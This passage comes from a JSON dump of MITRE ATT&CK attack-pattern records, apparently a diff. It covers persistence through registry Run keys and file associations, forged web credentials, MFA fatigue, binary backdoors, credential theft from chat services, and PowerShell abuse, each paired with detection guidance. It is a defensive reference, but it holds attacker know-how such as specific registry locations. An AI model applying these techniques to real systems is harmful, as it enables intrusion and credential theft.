HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Oddvar Moe, @oddvarmoe" + ], + "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_system_requirements": [ + "HKEY_LOCAL_MACHINE keys require administrator access to create and modify" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9422fc14-1c43-410d-ab0f-a709b76c72dc", + "created": "2017-05-31T21:30:49.988Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1060", + "external_id": "T1060" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/270.html", + "external_id": "CAPEC-270" + }, + { + "source_name": "Microsoft Run Key", + "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/aa376977" + }, + { + "source_name": "Microsoft RunOnceEx APR 2018", + "description": "Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018.", + "url": "https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key" + }, + { + "source_name": "Oddvar Moe RunOnceEx Mar 2018", + "description": "Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.", + "url": "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-15T11:10:03.428Z", + "name": "Forge Web Credentials", + "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nThe generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.(Citation: AWS Temporary Security Credentials)(Citation: Zimbra Preauth)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Dylan Silva, AWS Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "SaaS", + "Windows", + "macOS", + "Linux", + "Azure AD", + "Office 365", + "Google Workspace", + "IaaS" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", + "created": "2020-12-17T02:13:46.247Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1606", + "external_id": "T1606" + }, + { + "source_name": "AWS Temporary Security Credentials", + "description": "AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html" + }, + { + "source_name": "Unit 42 Mac Crypto Cookies January 2019", + "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" + }, + { + "source_name": "GitHub AWS-ADFS-Credential-Generator", + "description": "Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.", + "url": "https://github.com/damianh/aws-adfs-credential-generator" + }, + { + "source_name": "Microsoft SolarWinds Customer Guidance", + "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.", + "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/" + }, + { + "source_name": "Pass The Cookie", + "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", + "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html" + }, + { + "source_name": "Zimbra Preauth", + "description": "Zimbra. (2023, March 16). Preauth. Retrieved May 31, 2023.", + "url": "https://wiki.zimbra.com/wiki/Preauth" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Detect Program State", + "description": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0870", + "external_id": "T0870" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T04:26:29.365Z", + "name": "Multi-Factor Authentication Request Generation", + "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jon Sternstein, Stern Security", + "Pawel Partyka, Microsoft 365 Defender", + "Shanief Webb", + "Obsidian Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor user account logs as well as 2FA/MFA application logs for suspicious events: unusual login attempt source location, mismatch in location of login attempt and smart device receiving 2FA/MFA request prompts, and high volume of repeated login attempts, all of which may indicate user's primary credentials have been compromised minus 2FA/MFA mechanism. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Azure AD", + "Google Workspace" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "created": "2022-04-01T02:15:49.754Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1621", + "external_id": "T1621" + }, + { + "source_name": "Russian 2FA Push Annoyance - Cimpanu", + "description": "Catalin Cimpanu. (2021, December 9). Russian hackers bypass 2FA by annoying victims with repeated push notifications. Retrieved March 31, 2022.", + "url": "https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/" + }, + { + "source_name": "MFA Fatigue Attacks - PortSwigger", + "description": "Jessica Haworth. (2022, February 16). MFA fatigue attacks: Users tricked into allowing device access due to overload of push notifications. Retrieved March 31, 2022.", + "url": "https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications" + }, + { + "source_name": "Suspected Russian Activity Targeting Government and Business Entities Around the Globe", + "description": "Luke Jenkins, Sarah Hawley, Parnian Najafi, Doug Bienstock. (2021, December 6). Suspected Russian Activity Targeting Government and Business Entities Around the Globe. Retrieved April 15, 2022.", + "url": "https://www.mandiant.com/resources/russian-targeting-gov-business" + }, + { + "source_name": "Obsidian SSPR Abuse 2023", + "description": "Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.", + "url": "https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T13:03:40.824Z", + "name": "Compromise Host Software Binary", + "description": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\n\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.\n\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "CrowdStrike Falcon OverWatch" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "created": "2020-02-11T18:18:34.279Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1554", + "external_id": "T1554" + }, + { + "source_name": "Unit42 Banking Trojans Hooking 2022", + "description": "Or Chechik. (2022, October 31). Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure. Retrieved September 27, 2023.", + "url": "https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n" + }, + { + "source_name": "ESET FontOnLake Analysis 2021", + "description": "Vladislav Hrčka. (2021, January 1). FontOnLake. Retrieved September 27, 2023.", + "url": "https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-11T00:34:00.779Z", + "name": "Chat Messages", + "description": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.\n\nRather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Douglas Weir" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", + "created": "2023-03-14T14:38:03.673Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1552/008", + "external_id": "T1552.008" + }, + { + "source_name": "Slack Security Risks", + "description": "Michael Osakwe. (2020, November 18). 4 SaaS and Slack Security Risks to Consider. Retrieved March 17, 2023.", + "url": "https://www.nightfall.ai/blog/saas-slack-security-risks-2020" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T18:01:37.575Z", + "name": "PowerShell", + "description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Mayuresh Dani, Qualys", + "Praetorian", + "Ross Brittain" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.\n\nMonitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)\n\nIt is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.\n\nConsider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "created": "2020-03-09T13:48:55.078Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/001", + "external_id": "T1059.001" + }, + { + "source_name": "Microsoft PSfromCsharp APR 2014", + "description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.", + "url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/" + }, + { + "source_name": "SilentBreak Offensive PS Dec 2015", + "description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.", + "url": "https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/" + }, + { + "source_name": "FireEye PowerShell Logging 2016", + "description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + }, + { + "source_name": "Github PSAttack", + "description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.", + "url": "https://github.com/jaredhaight/PSAttack" + }, + { + "source_name": "inv_ps_attacks", + "description": "Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.", + "url": "https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/" + }, + { + "source_name": "Malware Archaeology PowerShell Cheat Sheet", + "description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.", + "url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" + }, + { + "source_name": "TechNet PowerShell", + "description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.", + "url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx" + }, + { + "source_name": "Sixdub PowerPick Jan 2016", + "description": "Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.", + "url": "https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Shortcut Modification", + "description": "Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "created": "2017-05-31T21:30:30.757Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1023", + "external_id": "T1023" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/132.html", + "external_id": "CAPEC-132" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Change Default File Association", + "description": "Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n\nSystem file associations are listed under HKEY_CLASSES_ROOT\\.[extension], for example HKEY_CLASSES_ROOT\\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\\\\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\\\\[handler]\\shell\\\\[action]\\command. For example: \n\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\print\\command\n* HKEY_CLASSES_ROOT\\txtfile\\shell\\printto\\command\n\nThe values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Stefan Kanthak" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.\n\nUser file association preferences are stored under [HKEY_CURRENT_USER]\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.\n\nAlso look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM", + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--98034fef-d9fb-4667-8dc4-2eab6231724c", + "created": "2020-01-24T13:40:47.282Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/001", + "external_id": "T1546.001" + }, + { + "source_name": "Microsoft Change Default Programs", + "description": "Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.", + "url": "https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs" + }, + { + "source_name": "Microsoft File Handlers", + "description": "Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/bb166549.aspx" + }, + { + "source_name": "Microsoft Assoc Oct 2017", + "description": "Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.", + "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/assoc" + }, + { + "source_name": "TrendMicro TROJ-FAKEAV OCT 2012", + "description": "Sioting, S. (2012, October 8). TROJ_FAKEAV.GZD. Retrieved August 8, 2018.", + "url": "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "VDSO Hijacking", + "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009)(Citation: Backtrace VDSO)(Citation: VDSO Aug 2005)(Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + 